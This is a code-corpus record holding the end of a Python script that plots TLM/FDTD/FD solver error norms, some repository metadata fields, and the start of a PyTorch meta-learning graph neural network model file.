                markersize=4, markeredgewidth=1.2, markeredgecolor='b',
                markerfacecolor='None')
    # plt.legend(('TLM', 'FDTD'))
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel('Obs. order of accuracy', fontsize=12)
    plt.ylim(0, 4)
    ax = fig.add_subplot(122)
    ax.semilogx(h_set[:-1], ord_acc_max[:], 'bd',
                markersize=4, markeredgewidth=1.2, markeredgecolor='b',
                markerfacecolor='None')
    # plt.legend(('TLM', 'FDTD'))
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel('Obs. order of accuracy', fontsize=12)
    plt.ylim(0, 4)
    plt.tight_layout()
    if save_fig:
        res_path = os.path.join(base_path.rsplit(os.sep, 1)[0],
                                'results', 'case%i' % case, 'figures')
        if not os.path.exists(res_path):
            os.makedirs(res_path)
        plt.savefig(os.path.join(res_path, 'ord_acc_fd_cfa2018.eps'),
                    transparent=True, bbox_inches='tight', pad_inches=0)
        plt.savefig(os.path.join(res_path, 'ord_acc_fd_cfa2018.png'),
                    transparent=True, bbox_inches='tight', pad_inches=0)
        plt.savefig(os.path.join(res_path, 'ord_acc_fd_cfa2018.pdf'),
                    transparent=True, bbox_inches='tight', pad_inches=0)
    plt.show()
def plot_errors_norms_cfa2018(h_set, avg_error_tlm, avg_error_fdtd,
                              two_norm_tlm, two_norm_fdtd,
                              max_norm_tlm, max_norm_fdtd,
                              ord_acc_tlm_one, ord_acc_fdtd_one,
                              ord_acc_tlm_two, ord_acc_fdtd_two,
                              ord_acc_tlm_max, ord_acc_fdtd_max, case):
    """
    Plot TLM vs FDTD error norms and observed orders of accuracy (cfa2018).

    Figure 1 shows the 2-norm (left) and max-norm (right) of the error for
    both solvers against 1st- and 2nd-order theoretical slopes; figure 2
    shows the observed order of accuracy between consecutive grids.

    :param h_set: spatial step sequence (m); assumed to be a numpy array
        (element-wise ``h_th / h_set[j]`` scaling is used) — TODO confirm.
    :param avg_error_tlm: error averaged over all receivers for the TLM
        for each spatial step (accepted but not plotted here).
    :type avg_error_tlm: 1d-array
    :param avg_error_fdtd: error averaged over all receivers for the FDTD
        for each spatial step (accepted but not plotted here).
    :type avg_error_fdtd: 1d-array
    :param two_norm_tlm: relative error in the 2-norm for the TLM.
    :type two_norm_tlm: 1d-array
    :param two_norm_fdtd: relative error in the 2-norm for the FDTD.
    :type two_norm_fdtd: 1d-array
    :param max_norm_tlm: relative error in the MAX-norm for the TLM.
    :type max_norm_tlm: 1d-array
    :param max_norm_fdtd: relative error in the MAX-norm for the FDTD.
    :type max_norm_fdtd: 1d-array
    :param ord_acc_tlm_one: order of accuracy in the 1-norm for the TLM
        (accepted but not plotted here).
    :param ord_acc_fdtd_one: order of accuracy in the 1-norm for the FDTD
        (accepted but not plotted here).
    :param ord_acc_tlm_two: order of accuracy in the 2-norm for the TLM.
    :type ord_acc_tlm_two: 1d-array
    :param ord_acc_fdtd_two: order of accuracy in the 2-norm for the FDTD.
    :type ord_acc_fdtd_two: 1d-array
    :param ord_acc_tlm_max: order of accuracy in the max-norm for the TLM.
    :type ord_acc_tlm_max: 1d-array
    :param ord_acc_fdtd_max: order of accuracy in the max-norm for the FDTD.
    :type ord_acc_fdtd_max: 1d-array
    :param case: integer that sorts the saved folders in the results dir.
    :type case: int
    :return: None; shows and saves two figures.
    """
    # ``print`` as a function: valid in both Python 2 and 3 (the original
    # Python-2 print statements broke under Python 3).
    print('Plotting the errors')
    h_th = np.linspace(h_set[0] - 0.001, h_set[-1] + 0.001, 100)
    j = 1  # reference grid index for the theoretical convergence slopes
    fig = plt.figure('Errors', figsize=(9., 4.))
    ax = fig.add_subplot(121)
    ax.loglog(h_set, two_norm_tlm[:], 'rs',
              markersize=7, markeredgewidth=1.8, markeredgecolor='r',
              markerfacecolor='None')
    ax.loglog(h_set, two_norm_fdtd[:], 'go',
              markersize=4, markeredgewidth=1.8, markeredgecolor='g',
              markerfacecolor='None')
    ax.loglog(h_th, (h_th / h_set[j]) ** 1 * two_norm_tlm[j], 'm--', lw=1)
    ax.loglog(h_th, (h_th / h_set[j]) ** 2 * two_norm_tlm[j], 'b-', lw=1)
    plt.legend(('TLM', 'FDTD', '1st order', '2nd order'))
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel(r'$||error||_{2}$', fontsize=12)
    plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.01)
    plt.ylim(10 ** -7, 10 ** -3)
    plt.tight_layout()
    ax = fig.add_subplot(122)
    ax.loglog(h_th, (h_th / h_set[j]) ** 1 * max_norm_tlm[j], 'm--', lw=1)
    ax.loglog(h_th, (h_th / h_set[j]) ** 2 * max_norm_tlm[j], 'b-', lw=1)
    ax.loglog(h_set, max_norm_tlm[:], 'rs',
              markersize=7, markeredgewidth=1.8, markeredgecolor='r',
              markerfacecolor='None')
    ax.loglog(h_set, max_norm_fdtd[:], 'go',
              markersize=4, markeredgewidth=1.8, markeredgecolor='g',
              markerfacecolor='None')
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel(r'$||error||_{max}$', fontsize=12)
    plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.01)
    plt.ylim(10 ** -7, 10 ** -3)
    plt.tight_layout()
    res_path = os.path.join(base_path.rsplit(os.sep, 1)[0],
                            'results', 'case%i' % case, 'figures')
    if not os.path.exists(res_path):
        os.makedirs(res_path)
    plt.savefig(os.path.join(res_path, 'errors_cfa2018.eps'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    plt.savefig(os.path.join(res_path, 'errors_cfa2018.png'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    plt.savefig(os.path.join(res_path, 'errors_cfa2018.pdf'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    # =========================================================================
    # Order of accuracy btw. 2 consecutive points
    # =========================================================================
    fig = plt.figure('Order of accuracy', figsize=(9., 4.))
    ax = fig.add_subplot(121)
    ax.semilogx(h_set[:-1], ord_acc_tlm_two[:], 'rs',
                markersize=7, markeredgewidth=1.8, markeredgecolor='r',
                markerfacecolor='None')
    ax.semilogx(h_set[:-1], ord_acc_fdtd_two[:], 'go',
                markersize=4, markeredgewidth=1.8, markeredgecolor='g',
                markerfacecolor='None')
    plt.legend(('TLM', 'FDTD'))
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel('Obs. order of accuracy', fontsize=12)
    plt.ylim(0, 4)
    ax = fig.add_subplot(122)
    ax.semilogx(h_set[:-1], ord_acc_tlm_max[:], 'rs',
                markersize=7, markeredgewidth=1.8, markeredgecolor='r',
                markerfacecolor='None')
    ax.semilogx(h_set[:-1], ord_acc_fdtd_max[:], 'go',
                markersize=4, markeredgewidth=1.8, markeredgecolor='g',
                markerfacecolor='None')
    # plt.legend(('TLM', 'FDTD'))
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel('Obs. order of accuracy', fontsize=12)
    plt.ylim(0, 4)
    plt.tight_layout()
    plt.savefig(os.path.join(res_path, 'ord_acc_cfa2018.eps'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    plt.savefig(os.path.join(res_path, 'ord_acc_cfa2018.png'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    plt.savefig(os.path.join(res_path, 'ord_acc_cfa2018.pdf'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    plt.show()
def plot_errors_norms_fd_fdtd_tlm_cfa2018(h_set, one_norm_fd,
                                          one_norm_tlm, one_norm_fdtd,
                                          two_norm_fd, two_norm_tlm, two_norm_fdtd,
                                          max_norm_fd, max_norm_tlm, max_norm_fdtd,
                                          ord_acc_fd_one, ord_acc_tlm_one, ord_acc_fdtd_one,
                                          ord_acc_fd_two, ord_acc_tlm_two, ord_acc_fdtd_two,
                                          ord_acc_fd_max, ord_acc_tlm_max, ord_acc_fdtd_max, case):
    """
    Plot FD vs TLM vs FDTD error norms and observed orders of accuracy
    (cfa2018, three-solver comparison).

    Figure 1 shows the 2-norm (left) and max-norm (right) of the error
    for the three solvers against 1st- and 2nd-order theoretical slopes;
    figure 2 shows the observed order of accuracy between consecutive
    grids for each solver and norm.

    :param h_set: spatial step sequence (m); assumed to be a numpy array
        (element-wise ``h_th / h_set[j]`` scaling is used) — TODO confirm.
    :param one_norm_fd: relative error in the 1-norm for the FD
        (accepted but not plotted here).
    :param one_norm_tlm: relative error in the 1-norm for the TLM
        (accepted but not plotted here).
    :param one_norm_fdtd: relative error in the 1-norm for the FDTD
        (accepted but not plotted here).
    :param two_norm_fd: relative error in the 2-norm for the FD.
    :param two_norm_tlm: relative error in the 2-norm for the TLM.
    :param two_norm_fdtd: relative error in the 2-norm for the FDTD.
    :param max_norm_fd: relative error in the MAX-norm for the FD.
    :param max_norm_tlm: relative error in the MAX-norm for the TLM.
    :param max_norm_fdtd: relative error in the MAX-norm for the FDTD.
    :param ord_acc_fd_one: order of accuracy in the 1-norm for the FD
        (accepted but not plotted here).
    :param ord_acc_tlm_one: order of accuracy in the 1-norm for the TLM
        (accepted but not plotted here).
    :param ord_acc_fdtd_one: order of accuracy in the 1-norm for the FDTD
        (accepted but not plotted here).
    :param ord_acc_fd_two: order of accuracy in the 2-norm for the FD.
    :param ord_acc_tlm_two: order of accuracy in the 2-norm for the TLM.
    :param ord_acc_fdtd_two: order of accuracy in the 2-norm for the FDTD.
    :param ord_acc_fd_max: order of accuracy in the max-norm for the FD.
    :param ord_acc_tlm_max: order of accuracy in the max-norm for the TLM.
    :param ord_acc_fdtd_max: order of accuracy in the max-norm for the FDTD.
    :param case: integer that sorts the saved folders in the results dir.
    :type case: int
    :return: None; shows and saves two figures.
    """
    # ``print`` as a function: valid in both Python 2 and 3 (the original
    # Python-2 print statement broke under Python 3).
    print('Plotting the errors')
    h_th = np.linspace(h_set[0] - 0.001, h_set[-1] + 0.001, 100)
    j = 1  # reference grid index for the theoretical convergence slopes
    fig = plt.figure('Errors', figsize=(9., 4.))
    ax = fig.add_subplot(121)
    ax.loglog(h_set, two_norm_fd[:], 'bd',
              markersize=4, markeredgewidth=1.2, markeredgecolor='b',
              markerfacecolor='None')
    ax.loglog(h_set, two_norm_fdtd[:], 'go',
              markersize=5, markeredgewidth=1.8, markeredgecolor='g',
              markerfacecolor='None')
    ax.loglog(h_set, two_norm_tlm[:], 'rs',
              markersize=5, markeredgewidth=1.8, markeredgecolor='r',
              markerfacecolor='None')
    ax.loglog(h_th, (h_th / h_set[j]) ** 1 * two_norm_tlm[j], 'm--', lw=1)
    ax.loglog(h_th, (h_th / h_set[j]) ** 2 * two_norm_tlm[j], 'b-', lw=1)
    plt.legend(('FD', 'FDTD', 'TLM', '1st order', '2nd order'))
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel(r'$||error||_{2}$', fontsize=12)
    plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.01)
    plt.ylim(10 ** -8, 10 ** -0)
    plt.tight_layout()
    ax = fig.add_subplot(122)
    ax.loglog(h_th, (h_th / h_set[j]) ** 1 * max_norm_tlm[j], 'm--', lw=1)
    ax.loglog(h_th, (h_th / h_set[j]) ** 2 * max_norm_tlm[j], 'b-', lw=1)
    ax.loglog(h_set, max_norm_fd[:], 'bd',
              markersize=4, markeredgewidth=1.2, markeredgecolor='b',
              markerfacecolor='None')
    ax.loglog(h_set, max_norm_fdtd[:], 'go',
              markersize=5, markeredgewidth=1.8, markeredgecolor='g',
              markerfacecolor='None')
    ax.loglog(h_set, max_norm_tlm[:], 'rs',
              markersize=5, markeredgewidth=1.8, markeredgecolor='r',
              markerfacecolor='None')
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel(r'$||error||_{max}$', fontsize=12)
    plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.01)
    plt.ylim(10 ** -8, 10 ** -0)
    plt.tight_layout()
    res_path = os.path.join(base_path.rsplit(os.sep, 1)[0],
                            'results', 'case%i' % case, 'figures')
    if not os.path.exists(res_path):
        os.makedirs(res_path)
    plt.savefig(os.path.join(res_path, 'errors_3_cfa2018.eps'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    plt.savefig(os.path.join(res_path, 'errors_3_cfa2018.png'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    plt.savefig(os.path.join(res_path, 'errors_3_cfa2018.pdf'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    # =========================================================================
    # Order of accuracy btw. 2 consecutive points
    # =========================================================================
    fig = plt.figure('Order of accuracy', figsize=(9., 4.))
    ax = fig.add_subplot(121)
    ax.semilogx(h_set[:-1], ord_acc_fd_two[:], 'bd',
                markersize=4, markeredgewidth=1.2, markeredgecolor='b',
                markerfacecolor='None')
    ax.semilogx(h_set[:-1], ord_acc_fdtd_two[:], 'go',
                markersize=5, markeredgewidth=1.8, markeredgecolor='g',
                markerfacecolor='None')
    ax.semilogx(h_set[:-1], ord_acc_tlm_two[:], 'rs',
                markersize=5, markeredgewidth=1.8, markeredgecolor='r',
                markerfacecolor='None')
    plt.legend(('FD', 'FDTD', 'TLM'))
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel('Obs. order of accuracy', fontsize=12)
    plt.ylim(0, 4)
    ax = fig.add_subplot(122)
    ax.semilogx(h_set[:-1], ord_acc_fd_max[:], 'bd',
                markersize=4, markeredgewidth=1.2, markeredgecolor='b',
                markerfacecolor='None')
    ax.semilogx(h_set[:-1], ord_acc_fdtd_max[:], 'go',
                markersize=5, markeredgewidth=1.8, markeredgecolor='g',
                markerfacecolor='None')
    ax.semilogx(h_set[:-1], ord_acc_tlm_max[:], 'rs',
                markersize=5, markeredgewidth=1.8, markeredgecolor='r',
                markerfacecolor='None')
    # plt.legend(('TLM', 'FDTD'))
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
    ax.grid(True, which="both", ls=":")
    plt.xlabel('$h$ (m)', fontsize=12)
    plt.ylabel('Obs. order of accuracy', fontsize=12)
    plt.ylim(0, 4)
    plt.tight_layout()
    plt.savefig(os.path.join(res_path, 'ord_acc_3_cfa2018.eps'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    plt.savefig(os.path.join(res_path, 'ord_acc_3_cfa2018.png'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    plt.savefig(os.path.join(res_path, 'ord_acc_3_cfa2018.pdf'), transparent=True,
                bbox_inches='tight', pad_inches=0)
    plt.show()
| 45.70852
| 91
| 0.599676
| 2,939
| 20,386
| 3.971759
| 0.073835
| 0.023987
| 0.03084
| 0.024672
| 0.917502
| 0.909706
| 0.902853
| 0.892487
| 0.883834
| 0.88332
| 0
| 0.036713
| 0.226381
| 20,386
| 445
| 92
| 45.811236
| 0.703443
| 0.070441
| 0
| 0.768116
| 0
| 0
| 0.095558
| 0.013451
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.014493
| null | null | 0.014493
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b841d52fe963876d5c64011fde9056d333ec0db8
| 16,330
|
py
|
Python
|
model.py
|
WenZhihao666/MI-GNN
|
0edb0b1b8874efdca52788fa1039380bff8caee6
|
[
"MIT"
] | 4
|
2021-05-07T02:21:26.000Z
|
2021-08-04T14:25:38.000Z
|
model.py
|
WenZhihao666/MI-GNN
|
0edb0b1b8874efdca52788fa1039380bff8caee6
|
[
"MIT"
] | 1
|
2021-05-24T07:42:00.000Z
|
2022-01-18T04:24:49.000Z
|
model.py
|
WenZhihao666/MI-GNN
|
0edb0b1b8874efdca52788fa1039380bff8caee6
|
[
"MIT"
] | 2
|
2021-05-01T09:36:01.000Z
|
2021-11-16T04:11:06.000Z
|
import torch
import numpy as np
from torch import nn
from torch.nn import functional as F
from torch import optim
from learner_1 import Learner_1
from learner_2 import Learner_2
from sklearn import metrics
from chemical import Chemical
from scaling_sgc import Scaling
from translation_sgc import Translation
import math
class Meta_MSNA(nn.Module):
    """Meta-learner over graph tasks with per-task prior modulation.

    For each task, node embeddings from the ``Learner_1`` prior are
    attention-pooled into a graph-level signal; that signal conditions the
    ``Scaling`` and ``Translation`` networks, which modulate the prior's
    parameters before MAML-style inner gradient steps on the support set.
    The query-set losses accumulated over a batch of tasks drive the outer
    (meta) update.

    NOTE(review): the exact shapes of the learner outputs and of the
    scaling/translation tensors are defined in the project-local modules
    (Learner_1, Chemical, Scaling, Translation) — not visible here.
    """

    def __init__(self, config, config_chemi, config_scal, config_trans, args, num_attri, label_dim):
        super(Meta_MSNA, self).__init__()
        # Inner-loop (per-task) and outer-loop (meta) learning rates.
        self.task_lr = args.task_lr
        self.meta_lr = args.meta_lr
        self.label_dim = label_dim
        self.hidden = args.hidden
        # Attention query matrices used to pool node embeddings into a
        # graph-level signal: one for the hidden layer, one for the
        # label-dimension layer.
        self.query_weight = nn.ParameterList()
        query_weight_0 = nn.Parameter(torch.FloatTensor(self.hidden, self.hidden))
        query_weight_1 = nn.Parameter(torch.FloatTensor(label_dim, label_dim))
        # Uniform init in [-1/sqrt(dim), 1/sqrt(dim)].
        stdv_0 = 1. / math.sqrt(self.hidden)
        stdv_1 = 1. / math.sqrt(label_dim)
        query_weight_0.data.uniform_(-stdv_0, stdv_0)
        query_weight_1.data.uniform_(-stdv_1, stdv_1)
        self.query_weight.append(query_weight_0)
        self.query_weight.append(query_weight_1)
        self.net = Learner_1(config)            # shared GNN prior
        self.chemical = Chemical(config_chemi)  # task-embedding network
        self.scaling = Scaling(config_scal, args, num_attri, label_dim)
        self.translation = Translation(config_trans, args, num_attri, label_dim)
        # Single Adam optimizer over all meta-parameters (prior,
        # task-embedding, modulation networks, and attention queries).
        self.meta_optim = optim.Adam([{'params': self.net.parameters()}, {'params': self.chemical.parameters()},
                                      {'params': self.scaling.parameters()}, {'params': self.translation.parameters()},
                                      {'params': self.query_weight}], lr=self.meta_lr)
        self.dataset = args.dataset

    def forward(self, x_spt, y_spt, x_qry, y_qry, idx_spt_list, idx_qry_list, features_list, neighs_list,
                l2_coef, Lab, update_step, batch_size, training):
        """Run meta-train (``training`` truthy) or meta-eval over all tasks.

        Returns ``(acc, Loss_q, MiF1s)``: query accuracy over all tasks,
        the final-step query loss averaged over ``task_num``, and the
        micro-averaged F1 score.
        """
        training = training
        task_num = len(x_spt)
        update_step = update_step
        # Query losses accumulated across ALL tasks (index = inner step).
        Losses_q = [0 for _ in range(update_step + 1)]
        accs = 0
        all_predictions = []
        all_predictions_f = []
        all_trues = []
        all_trues_f = []
        # Iterate over task batches; ceil(task_num / batch_size) batches.
        for j in range(int(task_num / batch_size) if task_num % batch_size == 0 else int(task_num / batch_size) + 1):
            start_idx = j * batch_size
            end_idx = min(start_idx + batch_size, task_num)
            # Per-batch query losses (index = inner step).
            losses_q = [0 for _ in range(update_step + 1)]
            for i in range(start_idx, end_idx):
                # print("neighs_list[i]:", neighs_list[i])
                # --- Task embedding: attention-pool both learner outputs.
                logits_1, logits_2 = self.net(features_list[i], neighs_list[i])
                instant_1 = torch.relu(torch.mm(torch.mean(logits_1, dim=0, keepdim=True), self.query_weight[0]))
                inside_sigmoid_1 = torch.mm(logits_1, instant_1.T)
                att_weight_1 = torch.sigmoid(inside_sigmoid_1)
                graph_signal_1 = torch.sum(att_weight_1 * logits_1, dim=0)
                instant_2 = torch.relu(torch.mm(torch.mean(logits_2, dim=0, keepdim=True), self.query_weight[1]))
                inside_sigmoid_2 = torch.mm(logits_2, instant_2.T)
                att_weight_2 = torch.sigmoid(inside_sigmoid_2)
                graph_signal_2 = torch.sum(att_weight_2 * logits_2, dim=0)
                chemical = torch.cat((graph_signal_1, graph_signal_2), dim=0)
                chemical = self.chemical(chemical)
                # --- Modulate the prior: theta_task = theta*(scale+1) + shift.
                scaling = self.scaling(chemical)
                translation = self.translation(chemical)
                adapted_prior = []
                for s in range(len(scaling)):
                    adapted_prior.append(torch.mul(self.net.parameters()[s], (scaling[s] + 1)) + translation[s])
                # --- First inner step: support loss w.r.t. the adapted prior.
                logits_1, logits_2 = self.net(features_list[i], neighs_list[i], adapted_prior)
                logit_spt = logits_2[idx_spt_list[i]]
                # Multi-label datasets use BCE; others use cross-entropy.
                if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                    loss = torch.nn.BCEWithLogitsLoss()
                    loss = loss(logit_spt, y_spt[i])
                else:
                    loss = torch.nn.functional.cross_entropy(logit_spt, y_spt[i])
                grad = torch.autograd.grad(loss, adapted_prior)
                # One SGD step on the adapted parameters (fast weights).
                fast_weights = list(map(lambda p: p[1] - self.task_lr * p[0], zip(grad, adapted_prior)))
                if update_step == 1:
                    # Single inner step: evaluate the query loss directly.
                    logits_1, logits_2 = self.net(features_list[i], neighs_list[i], fast_weights)
                    logits_q = logits_2[idx_qry_list[i]]
                    if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                        loss_q = torch.nn.BCEWithLogitsLoss()
                        loss_q = loss_q(logits_q, y_qry[i])
                    else:
                        loss_q = F.cross_entropy(logits_q, y_qry[i])
                    # L2 penalty on the modulation magnitudes.
                    l2_loss = torch.sum(torch.stack([torch.norm(k) for k in scaling]))
                    l2_loss += torch.sum(torch.stack([torch.norm(k) for k in translation]))
                    l2_loss = l2_loss * l2_coef
                    losses_q[1] += (loss_q + l2_loss)
                    Losses_q[1] += (loss_q + l2_loss)
                else:
                    # Remaining inner steps on the support set; the query
                    # loss is recorded only after the last step.
                    for k in range(1, update_step):
                        logits_1, logits_2 = self.net(features_list[i], neighs_list[i], fast_weights)
                        logit_spt = logits_2[idx_spt_list[i]]
                        if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                            loss = torch.nn.BCEWithLogitsLoss()
                            loss = loss(logit_spt, y_spt[i])
                        else:
                            loss = F.cross_entropy(logit_spt, y_spt[i])
                        grad = torch.autograd.grad(loss, fast_weights)
                        fast_weights = list(map(lambda p: p[1] - self.task_lr * p[0], zip(grad, fast_weights)))
                        if k == update_step - 1:
                            logits_1, logits_2 = self.net(features_list[i], neighs_list[i], fast_weights)
                            logits_q = logits_2[idx_qry_list[i]]
                            if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                                loss_q = torch.nn.BCEWithLogitsLoss()
                                loss_q = loss_q(logits_q, y_qry[i])
                            else:
                                loss_q = F.cross_entropy(logits_q, y_qry[i])
                            l2_loss = torch.sum(torch.stack([torch.norm(k) for k in scaling]))
                            l2_loss += torch.sum(torch.stack([torch.norm(k) for k in translation]))
                            l2_loss = l2_loss * l2_coef
                            losses_q[k + 1] += (loss_q + l2_loss)
                            Losses_q[k + 1] += (loss_q + l2_loss)
                # --- Collect query predictions for the metrics (no grad).
                with torch.no_grad():
                    if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                        # Multi-label: threshold sigmoids, then flatten
                        # (sample, label) pairs for the accuracy metric.
                        pred_q = torch.sigmoid(logits_q)
                        pred_q = torch.round(pred_q)
                        y_true = []
                        y_pred = []
                        for m in range(len(y_qry[i])):
                            for n in range(self.label_dim):
                                y_true.append((y_qry[i])[m, n].cpu())
                        for m in range(len(pred_q)):
                            for n in range(self.label_dim):
                                y_pred.append(pred_q[m, n].cpu())
                    else:
                        pred_q = F.softmax(logits_q, dim=1).argmax(dim=1)
                    if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                        # Flattened pairs for accuracy, full arrays for F1.
                        all_trues.append(y_true)
                        all_predictions.append(y_pred)
                        all_trues_f.append((y_qry[i].cpu()).numpy())
                        all_predictions_f.append((pred_q.cpu()).numpy())
                    else:
                        all_trues.append((y_qry[i].cpu()).numpy())
                        all_predictions.append((pred_q.cpu()).numpy())
            # --- Outer (meta) update on this batch's final-step query loss.
            loss_q = losses_q[-1] / batch_size
            if training == True:
                self.meta_optim.zero_grad()
                loss_q.backward()
                self.meta_optim.step()
        # --- Metrics over all tasks.
        all_trues = np.concatenate(all_trues)
        all_predictions = np.concatenate(all_predictions)
        acc = metrics.accuracy_score(all_trues, all_predictions, normalize=True)
        if self.dataset in ['Cuneiform', 'Sub_Yelp']:
            all_trues_f = np.concatenate(all_trues_f)
            all_predictions_f = np.concatenate(all_predictions_f)
            MiF1s = metrics.f1_score(all_trues_f, all_predictions_f, labels=Lab,
                                     average='micro')
        else:
            MiF1s = metrics.f1_score(all_trues, all_predictions, labels=Lab, average='micro')
        Loss_q = Losses_q[-1] / task_num
        return acc, Loss_q, MiF1s
class Meta_NA(nn.Module):
    """MAML-style meta-learner whose inner loop adapts task-specific weights.

    A graph-level "chemical" embedding is pooled from node features via
    attention, then mapped to per-parameter `scaling` and `translation`
    modulations of the base learner's prior weights. The inner loop takes
    `update_step` gradient steps on each task's support set; the outer loop
    (Adam) minimises the final-step query loss accumulated per mini-batch.
    """

    def __init__(self, config, config_chemi, config_scal, config_trans, args, num_attri, label_dim):
        super(Meta_NA, self).__init__()
        self.task_lr = args.task_lr  # inner-loop (per-task) step size
        self.meta_lr = args.meta_lr  # outer-loop (meta) learning rate
        self.label_dim = label_dim
        # Attention query vector pooling node embeddings into one graph signal.
        self.query_weight = nn.ParameterList()
        query_weight_1 = nn.Parameter(torch.FloatTensor(label_dim, 1))
        stdv = 1. / math.sqrt(label_dim)
        query_weight_1.data.uniform_(-stdv, stdv)
        self.query_weight.append(query_weight_1)
        self.net = Learner_2(config)            # base learner whose weights get adapted
        self.chemical = Chemical(config_chemi)  # task-embedding network
        self.scaling = Scaling(config_scal, args, num_attri, label_dim)          # multiplicative modulation
        self.translation = Translation(config_trans, args, num_attri, label_dim)  # additive modulation
        # Meta-optimiser updates all shared modules jointly.
        self.meta_optim = optim.Adam([{'params': self.net.parameters()}, {'params': self.chemical.parameters()},
                                      {'params': self.scaling.parameters()}, {'params': self.translation.parameters()}],
                                     lr=self.meta_lr)
        self.dataset = args.dataset

    def forward(self, x_spt, y_spt, x_qry, y_qry, idx_spt_list, idx_qry_list, features_list, neighs_list,
                l2_coef, Lab, update_step, batch_size, training):
        """Meta-train (or evaluate) over a list of tasks.

        Returns (accuracy, mean final-step query loss, micro-F1).
        NOTE(review): `update_step` must be >= 1 — with 0 steps `logits_q`
        would be unbound. Multi-label datasets ('Cuneiform', 'Sub_Yelp') use
        BCE + sigmoid/round; all others use cross-entropy + argmax.
        """
        training = training
        task_num = len(x_spt)
        all_predictions = []
        all_predictions_f = []
        all_trues = []
        all_trues_f = []
        # Losses_q[k]: query loss after k inner steps, summed over ALL tasks.
        Losses_q = [0 for _ in range(update_step + 1)]
        # Iterate tasks in mini-batches of `batch_size` (ceil division).
        for j in range(int(task_num / batch_size) if task_num % batch_size == 0 else int(task_num / batch_size) + 1):
            start_idx = j * batch_size
            end_idx = min(start_idx + batch_size, task_num)
            losses_q = [0 for _ in range(update_step + 1)]  # per-mini-batch accumulator
            for i in range(start_idx, end_idx):
                # Pool node embeddings into a single graph signal via attention.
                logits_2 = self.net(features_list[i])
                att_weight_2 = F.softmax(torch.mm(logits_2, self.query_weight[0]), dim=0)
                graph_signal_2 = torch.sum(att_weight_2 * logits_2, dim=0)
                chemical = self.chemical(graph_signal_2)
                scaling = self.scaling(chemical)
                translation = self.translation(chemical)
                # Task-conditioned prior: w * (1 + scale) + shift, per parameter.
                adapted_prior = []
                for s in range(len(scaling)):
                    adapted_prior.append(torch.mul(self.net.parameters()[s], (scaling[s] + 1)) + translation[s])
                # First inner-loop step on the support set.
                logits = self.net(x_spt[i], adapted_prior)
                if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                    loss = torch.nn.BCEWithLogitsLoss()
                    loss = loss(logits, y_spt[i])
                else:
                    loss = torch.nn.functional.cross_entropy(logits, y_spt[i])
                grad = torch.autograd.grad(loss, adapted_prior)
                fast_weights = list(map(lambda p: p[1] - self.task_lr * p[0], zip(grad, adapted_prior)))
                if update_step == 1:
                    # Single-step case: evaluate query loss right after step 1.
                    logits_q = self.net(x_qry[i], fast_weights)
                    if self.dataset in ['Cuneiform', 'Sub_Yelp']:
                        loss_q = torch.nn.BCEWithLogitsLoss()
                        loss_q = loss_q(logits_q, y_qry[i])
                    else:
                        loss_q = F.cross_entropy(logits_q, y_qry[i])
                    # L2 penalty keeps the modulations close to identity.
                    l2_loss = torch.sum(torch.stack([torch.norm(k) for k in scaling]))
                    l2_loss += torch.sum(torch.stack([torch.norm(k) for k in translation]))
                    l2_loss = l2_loss * l2_coef
                    losses_q[1] += (loss_q + l2_loss)
                    Losses_q[1] += (loss_q + l2_loss)
                else:
